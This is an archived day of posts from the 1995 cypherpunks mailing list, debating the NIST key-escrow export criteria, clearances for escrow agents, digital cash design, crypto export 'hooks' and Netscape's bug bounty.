wrote: > >Netscape has pretty clearly said that they don't like the idea of GAK, > > Actually netscape has not said that: > > Jeff has said that netscape *will* say that real soon now. Our representative at the NIST meeting said it there today. It should be up on the web site in a few days when he gets back from DC. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From holovacs at styx.ios.com Wed Dec 6 03:53:25 1995 From: holovacs at styx.ios.com (Jay Holovacs) Date: Wed, 6 Dec 95 03:53:25 PST Subject: Solution for US/Foreign Software? In-Reply-To: Message-ID: One potential "clean room" solution would be to publish precise interface specifications for the product. Overseas vendors and users could produce their own patches that match the interface. This is of course a kind of "hook", and the gov may sabre-rattle about it but I doubt it will stand up in court. Certainly publishing specs is no different than publishing "Applied Cryptography". Jay Holovacs PGP Key fingerprint = AC 29 C8 7A E4 2D 07 27 AE CA 99 4A F6 59 87 90 (KEY id 1024/80E4AA05) email me for key From holovacs at styx.ios.com Wed Dec 6 04:01:50 1995 From: holovacs at styx.ios.com (Jay Holovacs) Date: Wed, 6 Dec 95 04:01:50 PST Subject: Secret Clearance In-Reply-To: <199512060445.FAA22949@utopia.hacktic.nl> Message-ID: I think it's interesting that police and even FBI that normally operate "legally authorized" wiretaps do not require SECRET clearance. What really goes on here? Jay Holovacs PGP Key fingerprint = AC 29 C8 7A E4 2D 07 27 AE CA 99 4A F6 59 87 90 (KEY id 1024/80E4AA05) email me for key From pfarrell at netcom.com Wed Dec 6 04:10:19 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Wed, 6 Dec 95 04:10:19 PST Subject: NIST GAK export meeting, short version Message-ID: <25879.pfarrell@netcom.com> Just a quick note to explain what the govies claimed was the reason for the SECRET clearence.... They claimed it was needed so that they can serve a court order that is SECRET. Obviously, if the order is classified, then no one without clearence can see it -- the existance of the clearence is classified. The main area that they claimed was for FISA orders. FISA stands for something like Foriegn Intellegence Survellance Act. It is aimed at catching spies. The whole topic raises a ton of questions, such as traffic analysis when your _only_ cleared operator has to process a request. Plus, since you have to be a US citizen to get a clearence, how can there be approved foriegn escrow agents? And the usual, why in hell would a competent spy use crypto escrowed in the US? I'll put more in the long report. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From frissell at panix.com Wed Dec 6 04:15:46 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 6 Dec 95 04:15:46 PST Subject: The "Future" Fallacy Message-ID: <2.2b8.32.19951206121932.00842fec@panix.com> At 01:10 AM 12/6/95 -0800, Timothy C. May wrote: >I found nothing wrong or incorrect with the quote Duncan attributed to Bill >Gates (I haven't read Gates' book). > >I couldn't understand Duncan's koan, shrugged, and moved on. > >--Tim May >From my reply to someone called billg at microsoft.com: >>"Soon any child old enough to use a computer will be able to transmit coded >>messages that no government on earth will find easy to decipher." >> >>DCF The two "errors" in the sentence are: 1) The use of the future tense. There are a host of encryption products available today that are very strong. Unless you were talking about ease of use. Newt Gingrich -- in a similar statement -- was speaking generally rather than about children and that's where I noticed the error before. It is a present not a future capability. 2) And no government on earth will find easy to decipher is an understatement. As I'm sure you know, properly deployed modern cryptography (or even the 100-year-old technology of one-time-pads) is mathematically infeasible to break. Though of course attacks other decryption remain possible. Both of these are really quibbles rather than substantial criticisms. DCF "Who wonders if this is the real BG or one of the 90% of forged messages mentioned in the National Press Club speech." From nsb at nsb.fv.com Wed Dec 6 04:20:35 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Wed, 6 Dec 95 04:20:35 PST Subject: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment) In-Reply-To: <01HYG84E8ZRU9S3QKQ@mbcl.rutgers.edu> Message-ID: Excerpts from mail.nonpersonal: 5-Dec-95 Re: Geodesic Payment System.. "E. ALLEN SMITH"@mbcl.ru (2487) > All of this is assuming that the digital currency being produced has > a one-to-one ratio with some "real" currency. If, for instance, the digital > certificates were indeed bought with a one-to-one ratio from the producer, but > were traded to others for "real" cash at some market-determined discount, the > market would incorporate the risk. The traders who were willing to take the > risk that the certificates were not actually worth one dollar/whatever would > be able to make a profit by the difference between one digital dollar and one > "real" dollar. The problem is simplified even more with privately backed > currencies. I had assumed that there was a market discount, but it's still not quite that simple. It's very hard for markets to deal with *unbounded* risk. The biggest problem I see with most of the crypto-cash schemes is that there is a legitimate scenario -- however low-probability you might assess it to be -- of break-the-bank catastrophic failure, i.e. in which someone gains the keys that allow him to essentially print money. This kind of low-probability, infinite-cost risk is the kind of thing that gives underwriters the heebie jeebies. There's a good reason that most companies have "Ltd" after their name instead of "Unlimited", in those countries where that's the naming convention. Excerpts from mail.nonpersonal: 5-Dec-95 Re: Geodesic Payment System.. Wei Dai at eskimo.com (1749*) > But if we're converting > between one eletronic system and another, then cryptographic protocols > reduce the cost of protection to nearly zero for even small organizations. This is probably true, although protocol translation is a notoriously tricky and subtle business. But my comments were aimed at the conversion between electronic and physical monetary systems, not between different electronic systems. And, for this purpose, totally non-Internet mechanisms such as SWIFT or US ACH are, in my view, "physical" systems, for a number of historical reasons. If you disagree with that classification, however, you just push the line down a little further, but don't change the underlying assessement. -- NB -------- Nathaniel Borenstein | (Tense Hot Alien In Barn) Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON: FAQ & PGP key: nsb+faq at nsb.fv.com | http://www.netresponse.com/zldf From pfarrell at netcom.com Wed Dec 6 04:54:35 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Wed, 6 Dec 95 04:54:35 PST Subject: Secret Clearance Message-ID: <28532.pfarrell@netcom.com> In message Wed, 6 Dec 1995 06:57:12 -0500 (EST), Jay Holovacs writes: > I think it's interesting that police and even FBI that normally operate > "legally authorized" wiretaps do not require SECRET clearance. What > really goes on here? You can't walk the halls of the FBI headquarters without a clearance. The RBOCs do have cleared people that perform the taps. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From wb8foz at nrk.com Wed Dec 6 05:21:21 1995 From: wb8foz at nrk.com (David Lesher) Date: Wed, 6 Dec 95 05:21:21 PST Subject: Secret Clearance In-Reply-To: Message-ID: <199512061318.IAA11175@nrk.com> > > I think it's interesting that police and even FBI that normally operate > "legally authorized" wiretaps do not require SECRET clearance. What > really goes on here? ?? Feeb's have TS clearances, at least the ones I've dealt with. I strongly doubt any don't.. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From jya at pipeline.com Wed Dec 6 06:28:04 1995 From: jya at pipeline.com (John Young) Date: Wed, 6 Dec 95 06:28:04 PST Subject: ERA_sur Message-ID: <199512061429.JAA08877@pipe4.nyc.pipeline.com> There's implicit boost for encryption in the controversial "undeleting" of personal files on Jean Lewis's floppy, subpoenaed by Whitewater investigators. Peter Wayner has a thread about it on Cyberia-L. NYT had a brief about it yesterday, WSJ an editorial today. ERA_sur From pfarrell at netcom.com Wed Dec 6 06:38:00 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Wed, 6 Dec 95 06:38:00 PST Subject: NIST GAK export meeting, Long version part 1 Message-ID: <34717.pfarrell@netcom.com> NIST Key Export meeting, December 5, 1995 Long version, Part 1 of N This covers the criteria, except interoperability. (To keep TCMay's prediction from becoming true, I'll put this out in parts) This really needs a hypertext media. I'll build one for html page. Please bear with me on this, pure ASCII mail version. This is a write-up of stuff I left out of the summary. I'll merge them together on my nistpage, probably Friday. You've already seen the short write up. There is a fair amount of information on the NIST web server. Use url: < http://csrc.ncsl.nist.gov/keyescrow/> As David Lesher noted, one of the most significant things was obvious in the parking lot. Unlike September's meeting, this time it was empty. Inside the hall, it was obvious that no one came. It was packed in September, and now, entire rows were empty. I'm bad at guessing numbers, but its easy to guess that only 1/3 as many people showed. Maybe less. >The meeting was hosted by Ed Roback of NIST, The meeting was in general a repeat of September's meeting, and similar meetings that have been going on for years. Both sides talk past each other. I think this has degenerated into a parallel with the abortion debate. There is no common ground. >He said that they have studied the encryption that is supposed to be widely available on the Internet. >He said that viewed by crypto experts, not much is very good. He mentioned "two incidents" where >Netscape had weak implementations. He feels that companies will not trust software over the 'net. that >they "want the US Government to say that 'this is good enough'." I assume that the "two incidents" don't count breaking RC4-40. I can't remember two Netscape security incidents, unless he means to count RJC's buffer overflow, all I can remember is Ian's key generation problem. >Clint Brooks, of NSA, then went over the revised criteria. He claimed that they >were surprised at the industry concern over "one product" for worldwide markets. He stated that they were addressing "not domestic policy, per se, but we keep wrapping around" because of the 'one product' issue. The criteria are on the NIST page, url: They handed out a guide to the changes in the criteria between September and now. This is available from NIST as url: Here is a portion of it: Old Criterion 1. Moved to #7; Old Criterion 2. Moved to #8; Old Criterion 3. Split into #1 and #2 Old Criterion 5. Moved to #10 Old Criterion 6. Moved to #9; Old Criterion 7. Moved to #5; Old Criterion 8. Moved to #6; Old Criterion 9. Deleted. Old Criterion 10. Moved to #3; Only in Washington. Oh yeah, they also clarified a lot of the wording. Ideas that I thought important enough to make notes of concerning the criteria: These criteria do not address either hardware nor non-escrow encryption. Export controls of these are not changed, they can be exported with the current procedures. Brooks said that these rules are not applicable to the protection of internal data for US corporations, even for overseas locations of US firms. He said that getting permission to export for _internal corporate use_ is easy, if it is to protect corporate secrets and for internal communication. I took this to mean that a multi-national, US-based corporatgon can get a permit for ViaCrypt and export it for their own use. [later in the day, some people mentioned that this isn't nearly as easy as Brooks claimed.] He said that the intent in the new wording is flexibility. They don't want to prescribe implementation details, he wants industry to invent what sells. He specifically stated that the meetings were not about setting standards. This caused at least a fair amount of confusion, probably due to the fact that NIST used to be called National Bureau of Standards, and NBS set standards all the time. For example, a couple of folks were interested in interoperability, say between a Netscape encryption system and one made by, say, Microsoft. This meeting did not address this level of interoperability. about #2, "The product's key escrow cryptographic functions shall be inoperable until the key(s) is escrowed in accordance with #3." Brooks said that the intent was to allow vendors to make a single product that doesn't activate the key-escrow function if not needed. The idea was that when the keys are escrowed, the encryption engine would be activated. He also said that "manufacturers may not want to be in the key escrow business" and would therefore want to ship products that could be activated by a third party escrow agent. While talking about #3, "3. The product's key escrow cryptographic functions' key(s) shall be escrowed with escrow agent(s) certified by the U.S. Government, or certified by foreign governments with which the U.S. Government has formal agreements consistent with U.S. law enforcement and national security requirements." He stated that this does not preclude the use of "other agents." This became a major issue throughout the day. Ken Mendelson, staff attorney at TIS, asked (roughly) "Under what authority does the US Government grant certification to agents?" The response was a run around. Another hot issue was whether you can "hold your own keys" rather than using a third party. Seems that the corporate users are arguing that they want to hold their own keys, and the government reacted to that favorably (not unfavorably?). [Later in the day, Geoff Greiveldinger was asked if US citizens have the right to hold their own keys. Geoff was forced to admit that, "yes, you can hold your own keys"] #5, "5. The product's key escrow feature shall allow access to the key(s) needed to decrypt the product's ciphertext regardless of whether the product generated or received the ciphertext." Contains a significant change that was not discussed in September. It means that having the key for either end is sufficient. Brooks conceded that this was a big change, but claimed it was needed. The claim that one-ended surveillance is easier is most likely true. It clearly is easier if one end is US based and using GAK and the other is foreign where there is respect for civil liberties. He even claimed that it made the system less intrusive: His argument was roughly: Lets say they are snooping on me. With one-ended, they can read all of my messages, to and from, without needing the keys of my correspondents. (lets pick Geoff G. as an arbitrary correspondent) With two ended, they'd have to get both my key and Geoff's, and then they could read all of the messages Geoff gets or sends. I said it was _their_ argument. Seems to me to be groundless, unless they got the keys of everyone in the chain, all of the folks that I talk to, all of the folks that everyone I talk to, etc. on "7. The product's key escrow cryptographic functions shall use an unclassified encryption algorithm with a key length not to exceed sixty-four (64) bits." This is really aimed at session keys, or at least non-RSA keys. I suggested that they really needed some wording that make it clear. >He said that the 64-bit key limit is not meant to restrict RSA keys to >64-bits, but rather to restrict the session keys that are encrypted using >RSA. Unspoken was the assumption that the 2000 bit RSA secret key would have to be escrowed. on "8. The product's key escrow cryptographic functions shall not provide the feature of multiple encryption (e.g., triple- DES)." He pointed out that the wording used to say "prevent" and now just says "not provide". He acknowledged that "prevent" was impossible. on "9. The product's key escrow cryptographic functions shall interoperate only with key escrow cryptographic functions in products that meet these criteria, and shall not interoperate with the cryptographic functions of a product whose key escrow encryption function has been altered, bypassed, disabled, or otherwise rendered inoperative." Brooks said that this was intended to allow multiple modes, such as compatibility with other encryption schemes. Of course, he said, the other modes are subject to export restrictions. Somewhere in the discussion, Ed Appel took over for Brooks. Appel is "Director of Counter Intelligence Programs, National Security Council, The White House" He was introduced as FBI. >There were some interesting (and bad IMHO) implications of interoperability. I'll cover them more in the next section Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From trei at process.com Wed Dec 6 06:45:57 1995 From: trei at process.com (Peter Trei) Date: Wed, 6 Dec 95 06:45:57 PST Subject: NIST GAK export meeting, sv Message-ID: <9512061445.AA14166@toad.com> "Hieronymous" says: > (Thanks for the summary, Pat.) > This last bit is really rich. I can't think of a single publically > defensible reason for the stipulation that every escrow agent must employ > someone with SECRET clearance, but I *can* think of a publically > indefensible reason for it -- to facilitate those spooky non-court wiretap > authorizations that've been alluded to in the fine print of the GAK > proposals. This is probably one reason. Another is that they could shut down an escrow agent at a moment's notice by pulling the clearances. We haven't seen the other requirements, but an interesting question is what happens when an escrow agent goes out of business. Speaking for myself.... Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From rah at shipwright.com Wed Dec 6 07:37:43 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 6 Dec 95 07:37:43 PST Subject: No More Netscape Comments from Me Message-ID: >So, have fun riding the Great Internet Bubble of 1995! Yeah... I wonder what the price of Netscape puts around, say, March are these days... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From rah at shipwright.com Wed Dec 6 07:41:53 1995 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 6 Dec 95 07:41:53 PST Subject: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting onElectronic Payment) Message-ID: Once again, Hettinga shoots from the hip, and hits an expert instead... ;-) At 9:07 AM 12/5/95, Nathaniel Borenstein wrote: >There are some interesting unspoken assumptions here. To calculate >anyone's "cost" on a transaction requires the complex amortization of >costs over many transactions, with assumptions/projections about the >transaction volume. I have no idea where you came by either of your >numbers, MTB's or FV's, but I can tell you that your guess about FV is >off the mark. And I'm sure that MTB is no more eager than we are to >publicly dissect all the underlying cost structures, so I have no idea >what the 50 cents that you cite really means. The 50 cents actually comes from this week's InfoWorld, Bob Metcalfe's column. I have know idea where he got the 50 cents, but he did say digital cash, so i expect that he means MTB. >To be perfectly clear: our minimum service charge is 30 cents, not 5 >dollars. If we didn't think it was worthwhile to take transactions that >small, we wouldn't do so. Fine. Are we including the cost of the credit card transaction to the consumer? Fees, interest, that stuff? There are lots of hidden costs in a book entry system. With a bearer-certificate system, the price is the spread between the certificate's bid and asked prices for (a traveller's check, for instance, is asked at a primium, and redeemed at face value, for instance. That's all the cost of using them.) >A true geodesic structure is self-supporting and self-structuring. A >cryptographic infrastructure can and should be similar, I agree >completely. However, a *monetary* infrastructure needs convertability, >and the points of conversion are always the best targets of attack for >criminals. (I've been casting about for an analogy to physical >geodesics, and it's hard to find one. The best I can come up with is to >imagine that in order to convert a carbon buckyball to a more >conventional set of carbon molecules, you had to do it through a service >bureau that was capable of error, fraud, or subversion by outside >criminals. This would ONLY matter if you ever wanted to do such >conversions, but it would matter a lot then, especially if you had to >suffer a serious financial loss if you got the wrong carbon molecules at >the end of the process.) Sometimes I feel like I'm beating this geodesic metaphor like a dead horse sometimes... ;-). > >IF you wanted to settle for a totally non-convertible economy (like >rubles in the old Soviet Union, or like the LETS system on the net >today, as I understand it) then you could build it geodesically. Really? > But if >you want to be able to convert back and forth between Internet payment >systems and non-Internet payment systems, it can never be truly >geodesic. It will always be attackable at the points of conversion. >(You may "trade digital certificates", but how do you know the ones >you're receiving were obtained for legitimate real-world value?) >Because of this, the underwriting financial institutions, who have a >very reasonable desire to limit their own risk, will inevitably seek the >protection-by-traceability offered by something less than perfect >anonymity. We may not like it, but it's a very natural position to be >taken by those who are actually bearing the financial risks at the point >of conversion. That may be true, Nathaniel, but just because the people who bring the money off the net need to be identified to the digital cash underwriter's (actually the underwriter's bank's) satisfaction, doesn't mean that the trades on the net can't be totally anonymous. We've gone over this before. Let's build a model to talk about this, and then you'll see what I mean. Suppose I open an anonymous bank account with ATM card. Then, on the net, I buy digital cash from a digital cash underwriter. The web-page reads my ATM swipe and PIN, and then pumps it (without the underwriter being able to read it) through to my bank, who says to the underwriter, "Yup, there's money here, send it to him, and I'll wire it you (now/overnight/whatever)." The digital cash underwriter then issues me my digital cash, and I put it on my hard drive. I buy stuff on the net. I sell stuff on the net. Sometimes I go online with the trade to check my buyers' cash, sometimes I don't. Element of risk there, but this risk can be made accountable. It's probably always going to be cheaper to do offline transactions, but there's the possibility that when I cash in that money, it has been spent already. Fair trade. It's probably quantifiable and thus can be dealt with. We won't know till we have data. Being an astute businessman (you can tell this is a model, right?), I end up with positive cashflow. So, that money I don't invest with a portfolio manager on the net by buying anonymous bearer certificates for his mutual fund, ;-), I decide to take off of the net and buy Netscape puts, March 1996, $10. So, I go to the underwriter's page (maybe I go to multiple underwriters' pages, or maybe there's an enterprising third-party money changer who honors all comers for a cut), and I cash out. I swipe my ATM and punch my PIN, and my bank says to the underwriter "OK, I know that account, how much are you sending me?", and the underwriter says how much, and how and when the money would arrive (wire? Rollerblade messenger? bunch of militia types in a purple Hummer?, anyway...). And there's money back off of the net. In this model, there's no reason why I can't send an anonymous software agent to buy stuff for me, why I can't buy anonymously or sell anonymously. So, given that model, what's the problem? Now, I've also been thinking about something else. Wei Dai has been talking about how anonymity will always cost more, and certainly, in the model above, there's a certain risk with doing off-line transactions. You don't know if the cash in the transaction is double-spent, like I said above, but that "special stuff" has to be done to accomodate anonymity, which will always cost more. I'll come back with a whole blather on this next week when I get back from the CyberDog Kitchen (I'm here, and Gromit says "hi"), but I think it comes from what the default mechanism for commerce is going to be, threaded, audit-trailed x.blabla or anarchic, geodesic, bearer-certificates. I bet you can guess where I'm going to come down on this... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From bdolan at use.usit.net Wed Dec 6 07:49:04 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Wed, 6 Dec 95 07:49:04 PST Subject: NIST GAK export meeting, sv In-Reply-To: <9512061445.AA14166@toad.com> Message-ID: On Wed, 6 Dec 1995, Peter Trei wrote: > "Hieronymous" says: > > (Thanks for the summary, Pat.) > > This last bit is really rich. I can't think of a single publically > > defensible reason for the stipulation that every escrow agent must employ > > someone with SECRET clearance, but I *can* think of a publically > > indefensible reason for it -- to facilitate those spooky non-court wiretap > > authorizations that've been alluded to in the fine print of the GAK > > proposals. > > This is probably one reason. Another is that they could shut down an > escrow agent at a moment's notice by pulling the clearances. We > haven't seen the other requirements, but an interesting question is > what happens when an escrow agent goes out of business. Firearms dealers are requred to keep records of purchases. In theory (and by law) they don't pass these records along to the authorities except in response to specific inquiries. However, in the last couple of years there have been numerous reports of mass copying of records by BATF or surrogates (specifics on request). And when a firearms dealer goes out of business, all records go to the BATF. So there is something of a precedent. Brad > > Speaking for myself.... > > > > Peter Trei > Senior Software Engineer > Purveyor Development Team > Process Software Corporation > http://www.process.com > trei at process.com > From perry at piermont.com Wed Dec 6 08:13:47 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 6 Dec 95 08:13:47 PST Subject: The "Future" Fallacy In-Reply-To: Message-ID: <199512061614.LAA12637@jekyll.piermont.com> Duncan's comment was quite obvious. Any child old enough to use a computer can already transmit coded messages that no government can find easy to decipher. The "Future Fallacy" is the prediction of things in the past. Timothy C. May writes: > >From: Duncan Frissell > >Bill Gates (like Mister Newt before him) committed what I call the Future > >Fallacy in "The Road Ahead." Page 106. > > > >"Soon any child old enough to use a computer will be able to transmit coded > >messages that no government on earth will find easy to decipher." > >................................................... > > > >Billg is an optimist. > >What's wrong with this picture, Duncan? > > I found nothing wrong or incorrect with the quote Duncan attributed to Bill > Gates (I haven't read Gates' book). > > I couldn't understand Duncan's koan, shrugged, and moved on. From blancw at accessone.com Wed Dec 6 08:15:37 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Wed, 6 Dec 95 08:15:37 PST Subject: The "Future" Fallacy Message-ID: <9512061617.AA03020@pulm1.accessone.com> From: Duncan Frissell 2) And no government on earth will find easy to decipher is an understatement. As I'm sure you know, properly deployed modern cryptography (or even the 100-year-old technology of one-time-pads) is mathematically infeasible to break. Though of course attacks other decryption remain possible. .................................................. I see what you mean. When I read his statement, I focused on the "will be able to transmit coded messages". I was thinking about the efforts of the govmt to prevent it, and about how nevertheless even a 10-year old will be able to accomplish it in spite of the efforts against it (GAK). .. Blanc From adam at homeport.org Wed Dec 6 08:28:21 1995 From: adam at homeport.org (Adam Shostack) Date: Wed, 6 Dec 95 08:28:21 PST Subject: Why Netscape employees should not leave In-Reply-To: <199512040002.AA08103@ideath.goldenbear.com> Message-ID: <199512061633.LAA29559@homeport.org> I think that this logic (below) is off. GAK is evil. Pure and simple. If the market wants CKE/optional escrow for business thats one thing. The recent NIST meeting has shown that any system promulgated by the government will force on us a system with excessive kowtowing to the 'interests of law enforcement.' If people want CKE, and I think they do, then the government will get 90% of what it gets with GAK, with none of the fight. Most companies will happily turn over keys at the flash of a badge, never mind a warrant. (Was it Doug Barnes who pointed out that spying is more exciting than banking?) If it was easy, I'd probably have backup escrowed copies of my secret keyring. In Lichtenstien. This leaves us to ask, why GAK is such a big deal at NIST, if CKE will get them most of what they want? First, they haven't realized that CKE is most of what they want. Second, they're worried about the extra 10%. Drug dealers and terrorists not using it. (This points towords an eventual mandate for GAK, even if it starts out voluntary. Many have noted this.) Third, they've invested so much energy in the fight for GAK that they're emotionally tied to the idea, and they can't say 'well this would be almost as good.' Adam | The last sentence seems backwards to me - mandatory GAK is the real evil, not | non-mandatory GAK. (non-mandatory GAK is just a special case of voluntary | key escrow, where some of us might choose to escrow to /dev/null, some to | their attorney, some to a friend, and some to freeh at fbi.gov.) Non-mandatory | GAK makes me nervous, because it seems susceptible to back-door coercion | ("Dear Citizen: We notice that you've turned off GAK. Don't you trust us? | Please write back and tell us why you're no longer letting us have access | to your net traffic. Do you have something to hide?") but mandatory GAK | is the worst-case scenario being implemented immediately. | -- "It is seldom that liberty of any kind is lost all at once." -Hume From tcmay at got.net Wed Dec 6 08:29:13 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Dec 95 08:29:13 PST Subject: Solution for US/Foreign Software? Message-ID: At 8:06 AM 12/6/95, jim bell wrote: >>"Crypto hooks," basically the scheme you are proposing, were thought of by >>the authorities and are not a bypass of the crypto export laws. >>--Tim May > > >I'm not saying they are a "bypass" of the laws. Rather, I'm saying that >if the goal is to: > >1. Let companies like Netscape make foreign sales. > >2. Still comply with the letter of the law. > And I'm saying that your proposal does NOT comply with the letter of the law. There's no point in arguing this, as the facts are clear. Consult the ITARs and the previous discussions here and elsewhere on the practice of leaving "hooks" that crypto modules can later be attached to. >If the USG tries to take the position that "any program which can be >modified into another program that gets around GAK is prohibited from >export," then they're going to have to stop allowing the export of >pre-formatted floppy disks because they're likewise an XOR away from PGP. > >So we're back to square one: Does the USG intend to allow ANY programs to >be exported? No, the USG has not (yet at least) prohibited export of blank programs or disks. The "no hooks" rule has some ambiguities, but is by no means quite this dumb. All I'm saying is that you need to look at what the laws are, and how they have affected existing products and companies, before announcing a "solution." --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From perry at piermont.com Wed Dec 6 08:46:39 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 6 Dec 95 08:46:39 PST Subject: No More Netscape Comments from Me In-Reply-To: Message-ID: <199512061647.LAA12675@jekyll.piermont.com> Robert Hettinga writes: > >So, have fun riding the Great Internet Bubble of 1995! > > Yeah... I wonder what the price of Netscape puts around, say, March are > these days... No conventional options are available on Netscape yet. The price on custom options is high, and you have to trade a very large (quarter to half million dollar) sum in order to get them. Perry From tcmay at got.net Wed Dec 6 08:50:35 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Dec 95 08:50:35 PST Subject: Compliance Audits Message-ID: (This is just a tangential thought, inspired by someone's commentary. Not a substitute for first principles argument.) At 3:53 PM 12/6/95, Brad Dolan wrote: >Firearms dealers are requred to keep records of purchases. In theory >(and by law) they don't pass these records along to the authorities >except in response to specific inquiries. > >However, in the last couple of years there have been numerous reports of >mass copying of records by BATF or surrogates (specifics on request). > >And when a firearms dealer goes out of business, all records go to the BATF. > >So there is something of a precedent. One FFL holder reported someplace (?) that when he drops out of the business--soon, as the licensing and reporting requirements, plus the fees, have risen a lot--he expects to have an accidental "office fire" to destroy the boxes of records he's kept for the last 20 years. I think BATF is currently too preoccupied with other more pressing matters to go around and conduct "compliance audits," but such audits are likely to increase in the future. (Especially as the new FFL licensing rules and fees squeeze the number of FFL holders down to a "manageable" level, which was one of the stated reasons for cranking up the fees and tightening the reporting requirements a while back.) The connection with crypto and key escrow is that licensed escrow agents (Big Brother Inside) will likely face compliance audits. Some random amount of traffic may even be opened to ensure compliance. (More speculatively, the rules may be written so that compliance audits are done on the traffic of end-users, with some fraction opened and the contents measured to ensure they are readable. The old "Use a random number, go to jail" scenario.) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From SBinkley at atitech.ca Wed Dec 6 08:57:33 1995 From: SBinkley at atitech.ca (Scott Binkley) Date: Wed, 6 Dec 95 08:57:33 PST Subject: GAK In-Reply-To: <6615943A02502C79@-SMF-> Message-ID: <6615943A01502C79@-SMF-> I heard a while back about being able to "split" up a PGP key. What about splitting up the key into many parts, and giving them out to multiple INDEPENDANT agencies. ie: One piece goes to the FBI, one to the NSA, one to some other committee, and so on. That way, no goverment body could just tap your conversations without getting approval from others, and gaining the pieces of your key. just a thought From hal9001 at panix.com Wed Dec 6 09:02:06 1995 From: hal9001 at panix.com (Robert A. Rosenberg) Date: Wed, 6 Dec 95 09:02:06 PST Subject: Secret Clearance Message-ID: At 21:00 12/5/95, Pete Loshin wrote: >>From working at an organization that did a lot of government work, >my understanding of the process of clearing employees is this: > >-certain tasks require knowledge or access that must be restricted >-you have to have a high degree of trust in the people doing those tasks >-people with money troubles, out-of-control addictions, skeletons in the > closet, and histories of "troubles" are prime targets for subversion >-doing a clearance check (in theory) eliminates the possibility that > these people will be blackmailed/bribed into revealing their secrets The problem is that they are subject to blackmailed/bribed/subversion ONLY because the employer will use the info as an excuse for firing/restricting the employee. If someone has a "skeleton in the closet" such as being gay, so long as the employer does not discrimate against gays who INFORM the employer of their sexual orientation or if the employer does not care about the person being gay (ie: removes it a potential blackmail threat) there is no problem so far as I can see. It is only when there is something that is WORK RELATED which would affect the person's performance if not known that the question of a background check is relevant. From an116512 at anon.penet.fi Wed Dec 6 09:11:01 1995 From: an116512 at anon.penet.fi (an116512 at anon.penet.fi) Date: Wed, 6 Dec 95 09:11:01 PST Subject: Netscape Bug Bounty... Message-ID: <9512061707.AA12269@anon.penet.fi> In .cypherpunks, Jeff Weinstein writes: > FYI, since both the bounty and the particular bug have been discussed >here... > free advert. > We are awarding Scott Weston $1000 for reporting the LiveScript history >problem. The announcement should show up on our Bug Bounty winner's >page by tomorrow. > hey, that'll make a real dent in the stock price (hint: three letters, 1st is s, 2nd is e, 3rd is c). > --Jeff > >Jeff Weinstein - Electronic Munitions Specialist why don't you at least try to be original, asshole? >Netscape Communication Corporation >jsw at netscape.com - http://home.netscape.com/people/jsw >Any opinions expressed above are mine. mostly yours, at least (except for the original parts). thief. > > --****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION*** Your e-mail reply to this message WILL be *automatically* ANONYMIZED. Please, report inappropriate use to abuse at anon.penet.fi For information (incl. non-anon reply) write to help at anon.penet.fi If you have any problems, address them to admin at anon.penet.fi From tcmay at got.net Wed Dec 6 09:33:21 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 6 Dec 95 09:33:21 PST Subject: News on Congressional Debate on Exon Message-ID: I just heard (12:15 EST) that the House has adopted language similar to the original Exon-Coates language in the Senate (as opposed to the White language, which was less restrictive in that it dealt with material that was "harmful" to children, interpreted to mean child porn). It looks like Internet Service Providers will soon be held liable for "indecent material" passed by their systems. I would expect most ISPs will drop the alt.binaries.* newsgroups as a first step, and maybe other groups as well. (Controlling Web page accesses is a much tougher problem, of course. so I wouldn't expect much action on this at first.) 